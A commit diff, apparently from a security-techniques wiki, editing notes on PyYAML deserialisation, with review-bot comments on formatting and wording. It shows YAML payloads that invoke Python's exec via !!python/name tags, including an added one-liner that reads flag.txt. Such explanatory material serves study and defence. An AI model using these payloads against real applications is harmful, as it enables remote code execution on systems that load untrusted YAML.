GitBook: [#3023] No subject

This commit is contained in:
CPol 2022-02-18 18:14:38 +00:00 committed by gitbook-bot
parent aae67966bf
commit d7e70413dc
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF


@ -72,7 +72,7 @@ print(yaml.unsafe_load_all(data))
**Old versions** of pyyaml were vulnerable to deserialisations attacks if you **didn't specify the Loader** when loading something: `yaml.load(data)`
You can find the **** [**description of the vulnerability here**](https://hackmd.io/@defund/HJZajCVlP)**. The proposed exploit in that page is:**
You can find the **** [**description of the vulnerability here**](https://hackmd.io/@defund/HJZajCVlP)**.** The proposed **exploit** in that page is:
```yaml
!!python/object/new:str
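Review bot: the replacement line still carries the stray empty-bold token `**** ` before the link and wraps the trailing period in its own bold span as `**.**`, so rendered Markdown will show literal asterisks or an empty emphasis; the edit only moved the closing `**` and did not clean this up. Suggest `You can find the [description of the vulnerability here](https://hackmd.io/@defund/HJZajCVlP). The proposed exploit in that page is:`.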
@ -83,6 +83,12 @@ state: !!python/tuple
update: !!python/name:exec
```
Or you could also use this **one-liner provided by @ishaack**:
```yaml
!!python/object/new:str {state: !!python/tuple ['print(exec("print(o"+"pen(\"flag.txt\",\"r\").read())"))', !!python/object/new:Warning {state : {update : !!python/name:exec } }]}
```
Note that in **recent versions** you cannot **no longer call `.load()`** **without a `Loader`** and the **`FullLoader`** is **no longer vulnerable** to that attack.
## RCE
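Review bot: the added note at the end of this hunk has a double negative, "you cannot **no longer call `.load()`**", which reads as the opposite of what is meant; it should say "you can no longer call `.load()` without a `Loader`". The same sentence says "recent versions" without naming which pyyaml release started requiring a `Loader` or which release fixed `FullLoader`, and readers checking their own dependency pins need that version; please add it with a reference. Minor: "Or you could also use" on the new lead-in line is redundant, "You can also use" suffices.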